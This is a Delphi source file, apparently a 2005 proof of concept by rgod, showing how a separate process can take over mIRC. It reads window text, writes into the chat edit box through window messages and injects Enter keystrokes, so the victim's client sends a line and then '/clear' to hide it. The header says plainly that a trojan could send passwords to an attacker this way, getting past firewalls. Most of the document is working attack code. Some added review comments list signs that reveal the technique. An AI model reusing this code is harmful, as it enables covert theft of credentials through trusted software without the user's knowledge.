//Mirc 6.16 and "generic Edit component" Win32 trick
//
//by rgod _ May 2, 2005
// 
//http://rgod.altervista.org
//
//Naturally you know that you can capture the text of an Edit box
//by sending it a WM_GETTEXT message, and set its text
//with a WM_SETTEXT message. Naturally you know you can also simulate
//a key press.
//So what happens when you use mIRC or other messaging software?
//
//To test the program, put a Timer on the form and
//compile with Delphi. Open two sessions of mIRC,
//authenticate in one session and open a
//query in the other. Now start the project executable.
//In the victim session, move the mouse over the title bar, where the alter-ego
//nick is displayed, and enjoy the show...
//This is how a Trojan can take advantage of mIRC and other
//messaging software to send passwords and other data
//to the attacker while bypassing firewall rules: the text is sent by the
//messaging client itself, which the firewall already allows.
//Naturally, it can all be invisible.
//Here is the code in Object Pascal...

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;

type
  // Main form of the proof of concept. It declares one timer component and
  // the timer handler, Timer1Timer, which is implemented further down in
  // this unit.
  TForm1 = class(TForm)
    // Timer component placed on the form at design time.
    // NOTE(review): the interval and the OnTimer wiring are presumably set
    // in the .dfm, which is not shown here - confirm.
    Timer1: TTimer;
  // Handler that runs the window inspection and message sending.
  procedure Timer1Timer(Sender: TObject);
    { Private declarations }
  public
    { Public declarations }
  end;
var
  // Global form instance.
  Form1: TForm1;

implementation

{$R *.dfm}

//procedure that simulates a key press...
procedure PostKey(key: Word; const shift: TShiftState; specialkey: Boolean);
{ Synthesizes one key press and release through keybd_event, wrapped in
  the requested modifier keys.

  key        - virtual-key code to press and release.
  shift      - modifiers to hold during the press; only ssCtrl, ssShift
               and ssAlt are looked at.
  specialkey - when True the key events carry KEYEVENTF_EXTENDEDKEY.

  keybd_event takes no window handle: the events enter the system input
  stream and go to whichever window has keyboard focus. Input produced
  this way is marked as injected (LLKHF_INJECTED) when a low-level
  keyboard hook sees it, which is one way monitoring software can tell
  it apart from physical typing. }
type
  TModifierEntry = record
    stateBit: Byte;
    vkCode: Byte;
  end;
  TLowBits = set of 0..7;
const
  // Press order is Ctrl, Shift, Alt; release runs in the opposite order.
  Modifiers: array [1..3] of TModifierEntry =
    ((stateBit: Ord(ssCtrl); vkCode: VK_CONTROL),
    (stateBit: Ord(ssShift); vkCode: VK_SHIFT),
    (stateBit: Ord(ssAlt); vkCode: VK_MENU));
var
  keyFlags: DWORD;
  // Overlays the first byte of the TShiftState set so that membership can
  // be tested by ordinal; the three ordinals used are taken from the enum
  // via Ord() in the table above.
  held: TLowBits absolute shift;
  n: Integer;
begin
  // Modifier keys go down first.
  for n := Low(Modifiers) to High(Modifiers) do
    if Modifiers[n].stateBit in held then
      keybd_event(Modifiers[n].vkCode, MapVirtualKey(Modifiers[n].vkCode, 0), 0, 0);

  keyFlags := 0;
  if specialkey then
    keyFlags := KEYEVENTF_EXTENDEDKEY;

  // Key down, then key up with the same flags plus KEYEVENTF_KEYUP.
  keybd_event(key, MapVirtualKey(key, 0), keyFlags, 0);
  keybd_event(key, MapVirtualKey(key, 0), keyFlags or KEYEVENTF_KEYUP, 0);

  // Modifier keys come back up in reverse order.
  for n := High(Modifiers) downto Low(Modifiers) do
    if Modifiers[n].stateBit in held then
      keybd_event(Modifiers[n].vkCode, MapVirtualKey(Modifiers[n].vkCode, 0),
        KEYEVENTF_KEYUP, 0);
end;

//function that finds the handle of a child control, given the handle of its parent window
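function FindControl(hApp: HWND; ControlClassName: string; ControlNr: Word = 1):
HWND;
{ Returns the handle of the ControlNr-th direct child of hApp whose window
  class is ControlClassName, or 0 when there is no such child.

  hApp             - handle of the parent window.
  ControlClassName - window class name to match, passed to FindWindowEx.
  ControlNr        - 1-based index among the matching children (default 1).

  Returns 0 when hApp is not a window, when ControlNr is 0, or when fewer
  than ControlNr matching children exist.

  The original fell through to "Result := hControl" with hControl
  unassigned when IsWindow(hApp) failed, so the caller could get an
  arbitrary handle back; every failure path now returns 0. }
var
  i: Word;
  hControl: HWND;
begin
  Result := 0;
  // ControlNr = 0 used to wrap to 65535 on Dec(); treat it as "no such child".
  if (ControlNr = 0) or not IsWindow(hApp) then
    Exit;
  hControl := 0;
  for i := 1 to ControlNr do
  begin
    // Each call continues the search after the child found by the previous one.
    hControl := FindWindowEx(hApp, hControl, PChar(ControlClassName), nil);
    if hControl = 0 then
      Exit;
  end;
  Result := hControl;
end;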

// Timer handler. On each tick it looks at the window under the mouse
// cursor, reads that window's text and class name, and, when the class
// name contains 'mIRC_Query' and the text contains the hard-coded nick,
// writes text into the window's first 'Edit' child and injects Enter.
//
// Review notes, defensive view:
// - Every step is an ordinary window message or input API call made from a
//   separate process; the messages carry no sender identity.
// - The outgoing chat line is transmitted by the messaging client itself,
//   so a firewall rule keyed on the sending program sees only the client.
// - Observable signs: WM_GETTEXT / WM_SETTEXT arriving at the client's
//   windows from another process, injected Enter key events, and a line
//   followed by '/clear' in a query window that the user did not type.
// - NOTE(review): Windows versions newer than this 2005 code restrict
//   window messages from lower- to higher-integrity processes (UIPI);
//   processes at the same integrity level are presumably still reachable -
//   confirm for the target platform.
procedure TForm1.Timer1Timer(Sender: TObject);
var
  hWnd: THandle;                      // window under the cursor
  hedit: THandle;                     // 'Edit' child returned by findcontrol
  aName: array [0..255] of Char;      // class name of hWnd
  mytext:array [0..10000] of char;    // text of hWnd, filled by WM_GETTEXT
  query: pchar;                       // text placed into the edit box
  rPos: TPoint;                       // cursor position in screen coordinates
begin

  if Boolean(GetCursorPos(rPos)) then
  begin
  hwnd:=WindowFromPoint(rPos);
  // The text is requested from whatever window is under the cursor, before
  // any check of its class; the window may belong to another process.
  sendmessage(hwnd,wm_gettext,10001,integer(@mytext));
  // The three conditions below are nested without begin/end, so the final
  // begin..end block runs only when all three hold.
  if Boolean(GetClassName(hWnd, aName, 256)) then


  if strpos(aName,'mIRC_Query') <> nil then // class name of the MDI child in mIRC

  if strpos(mytext,'rgod') <> nil then     // nick to match; it is shown in the
                                           // MDI child's title bar while the
                                           // victim has a query open with it

  begin // all conditions hold: send the message
    hedit:=findcontrol(hWnd,'Edit',1); // first 'Edit' child of the query window

    query:='hello';  // fixed demo text; the author notes that captured
                     // passwords could be sent here instead

    sendmessage(hedit,wm_settext,0,integer(query)); // replace the edit box
                                                    // contents with the text
    PostKey(13, [], False); // inject Enter (virtual key 13); keybd_event
                            // delivers it to the window that has focus
    query:='/clear';
    sendmessage(hedit,wm_settext,0,integer(query)); // put '/clear' in the edit box;
                                                    // the author's intent is to clear the
                                                    // window so the victim sees nothing
    PostKey(13, [], False); // inject Enter again to submit '/clear'
  end;
  end;
end;

end.